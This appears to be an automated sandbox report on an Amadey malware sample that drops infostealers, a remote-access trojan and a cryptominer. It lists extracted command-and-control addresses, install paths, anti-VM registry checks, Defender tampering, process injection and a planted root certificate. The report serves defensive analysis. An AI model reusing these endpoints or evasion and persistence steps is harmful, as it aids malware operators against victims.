amadey | 4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c

Analysis

max time kernel
150s
max time network
148s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 16:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
Size

1.8MB
MD5

eb1dfe1fde41dc7565b411d0d6b5e1cd
SHA1

f7ea906ef2769262b7368d552ff76c7de5aeceb6
SHA256

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c
SHA512

77967e24be05b52ca23ffdeeab266d395c554194411ef86b9493a8a23d6746fbe9f74b763da7aaa31545a07f9fbfb9f8ee56a9079aecd53e1d03f05e6d43c328
SSDEEP

49152:TGWfCBBXDBU+/4K9Ekd54XECY7W/+MaKkD:TNEZN3vYtF2

Score

10^/10

amadey redline stealc xmrig zgrat 1 @cloudytteam discovery evasion execution infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3908-37-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_zgrat_v1
behavioral2/memory/3460-81-0x0000000000220000-0x00000000002E0000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe	family_redline
behavioral2/memory/2804-74-0x00000000006C0000-0x0000000000712000-memory.dmp	family_redline
behavioral2/memory/3460-81-0x0000000000220000-0x00000000002E0000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe	family_redline
behavioral2/memory/3168-126-0x0000000000BC0000-0x0000000000C12000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	family_xmrig
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	xmrig
C:\Windows\Temp\639191.exe	family_xmrig
C:\Windows\Temp\639191.exe	xmrig
behavioral2/memory/4136-404-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-408-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-410-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-409-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-407-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-406-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-403-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-412-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4136-413-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exe4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4688 powershell.exe
2504 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4688	powershell.exe
2504	powershell.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplons.exeaxplons.exeaxplons.exe4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exeaxplons.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

Executes dropped EXE 37 IoCs

Processes:

axplons.exealex.exekeks.exegold.exetrf.exeredline1.exeinstall.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exe567679.exeswizzhis.exelumma1.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exePiercingNetLink.exeNewB.exeFirstZ.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe639191.exeaxplons.exeNewB.exereakuqnanrkn.exeNewB.exeaxplons.exeNewB.exeaxplons.exe

pid	process
3096	axplons.exe
2264	alex.exe
2804	keks.exe
2020	gold.exe
3460	trf.exe
3168	redline1.exe
3504	install.exe
5052	GameService.exe
2216	GameService.exe
3792	GameService.exe
4176	GameService.exe
2060	GameService.exe
2924	GameSyncLink.exe
760	567679.exe
556	swizzhis.exe
4420	lumma1.exe
2704	GameService.exe
2616	GameService.exe
4836	GameService.exe
4172	GameService.exe
1772	GameService.exe
2808	PiercingNetLink.exe
5052	NewB.exe
744	FirstZ.exe
2832	GameService.exe
4176	GameService.exe
4320	GameService.exe
1516	GameService.exe
1164	GameSyncLinks.exe
3216	639191.exe
5064	axplons.exe
4676	NewB.exe
2740	reakuqnanrkn.exe
1648	NewB.exe
1956	axplons.exe
4684	NewB.exe
1140	axplons.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exeaxplons.exeaxplons.exeaxplons.exe4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

Loads dropped DLL 1 IoCs

Processes:

567679.exe

pid process

760 567679.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
760	567679.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4136-398-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-404-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-408-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-410-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-409-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-407-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-406-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-403-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-399-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-401-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-402-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-400-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-412-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/4136-413-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

10 pastebin.com
39 pastebin.com

flow	ioc
10	pastebin.com
39	pastebin.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.exereakuqnanrkn.exeFirstZ.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

pid process

1264 4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
3096 axplons.exe
5064 axplons.exe
1956 axplons.exe
1140 axplons.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

alex.exegold.exeswizzhis.exelumma1.exereakuqnanrkn.exe

description	pid	process	target process
PID 2264 set thread context of 3908	2264	alex.exe	RegAsm.exe
PID 2020 set thread context of 4988	2020	gold.exe	RegAsm.exe
PID 556 set thread context of 236	556	swizzhis.exe	RegAsm.exe
PID 4420 set thread context of 4156	4420	lumma1.exe	RegAsm.exe
PID 2740 set thread context of 248	2740	reakuqnanrkn.exe	conhost.exe
PID 2740 set thread context of 4136	2740	reakuqnanrkn.exe	explorer.exe

Drops file in Program Files directory 15 IoCs

Processes:

install.exeGameSyncLinks.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe

Drops file in Windows directory 1 IoCs

Processes:

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

description ioc process

File created C:\Windows\Tasks\axplons.job 4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

description	ioc	process
File created	C:\Windows\Tasks\axplons.job	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4108	sc.exe
4712	sc.exe
2820	sc.exe
5064	sc.exe
776	sc.exe
4092	sc.exe
4844	sc.exe
2876	sc.exe
4220	sc.exe
2380	sc.exe
328	sc.exe
4008	sc.exe
1064	sc.exe
1512	sc.exe
2164	sc.exe
1924	sc.exe
4544	sc.exe
2944	sc.exe
1140	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1080 2264 WerFault.exe alex.exe
4524 236 WerFault.exe RegAsm.exe

pid	pid_target	process	target process
1080	2264	WerFault.exe	alex.exe
4524	236	WerFault.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2124 schtasks.exe

pid	process
2124	schtasks.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

keks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exeaxplons.exetrf.exeaxplons.exeredline1.exekeks.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exeexplorer.exe

pid	process
1264	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
1264	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe
3096	axplons.exe
3096	axplons.exe
3460	trf.exe
5064	axplons.exe
5064	axplons.exe
3168	redline1.exe
3168	redline1.exe
3168	redline1.exe
3168	redline1.exe
3168	redline1.exe
3168	redline1.exe
2804	keks.exe
2804	keks.exe
2804	keks.exe
2804	keks.exe
2804	keks.exe
2804	keks.exe
744	FirstZ.exe
4688	powershell.exe
4688	powershell.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
744	FirstZ.exe
2740	reakuqnanrkn.exe
2504	powershell.exe
2504	powershell.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
2740	reakuqnanrkn.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe
4136	explorer.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

Processes:

trf.exe639191.exeredline1.exekeks.exeRegAsm.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3460	trf.exe
Token: SeBackupPrivilege	3460	trf.exe
Token: SeSecurityPrivilege	3460	trf.exe
Token: SeSecurityPrivilege	3460	trf.exe
Token: SeSecurityPrivilege	3460	trf.exe
Token: SeSecurityPrivilege	3460	trf.exe
Token: SeLockMemoryPrivilege	3216	639191.exe
Token: SeDebugPrivilege	3168	redline1.exe
Token: SeDebugPrivilege	2804	keks.exe
Token: SeDebugPrivilege	3908	RegAsm.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeShutdownPrivilege	4836	powercfg.exe
Token: SeCreatePagefilePrivilege	4836	powercfg.exe
Token: SeShutdownPrivilege	3756	powercfg.exe
Token: SeCreatePagefilePrivilege	3756	powercfg.exe
Token: SeShutdownPrivilege	4188	powercfg.exe
Token: SeCreatePagefilePrivilege	4188	powercfg.exe
Token: SeShutdownPrivilege	2616	powercfg.exe
Token: SeCreatePagefilePrivilege	2616	powercfg.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeShutdownPrivilege	4788	powercfg.exe
Token: SeCreatePagefilePrivilege	4788	powercfg.exe
Token: SeLockMemoryPrivilege	4136	explorer.exe
Token: SeShutdownPrivilege	2868	powercfg.exe
Token: SeCreatePagefilePrivilege	2868	powercfg.exe
Token: SeShutdownPrivilege	4696	powercfg.exe
Token: SeCreatePagefilePrivilege	4696	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

639191.exe

pid process

3216 639191.exe

pid	process
3216	639191.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exeaxplons.exealex.exeRegAsm.exegold.exeinstall.execmd.exe

description	pid	process	target process
PID 1264 wrote to memory of 3096	1264	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe	axplons.exe
PID 1264 wrote to memory of 3096	1264	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe	axplons.exe
PID 1264 wrote to memory of 3096	1264	4c97db7331d17df48b8701c95a893cc7790dd51450f0da55b8af32fe51ce114c.exe	axplons.exe
PID 3096 wrote to memory of 2264	3096	axplons.exe	alex.exe
PID 3096 wrote to memory of 2264	3096	axplons.exe	alex.exe
PID 3096 wrote to memory of 2264	3096	axplons.exe	alex.exe
PID 2264 wrote to memory of 2008	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 2008	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 2008	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
PID 2264 wrote to memory of 3908	2264	alex.exe	RegAsm.exe
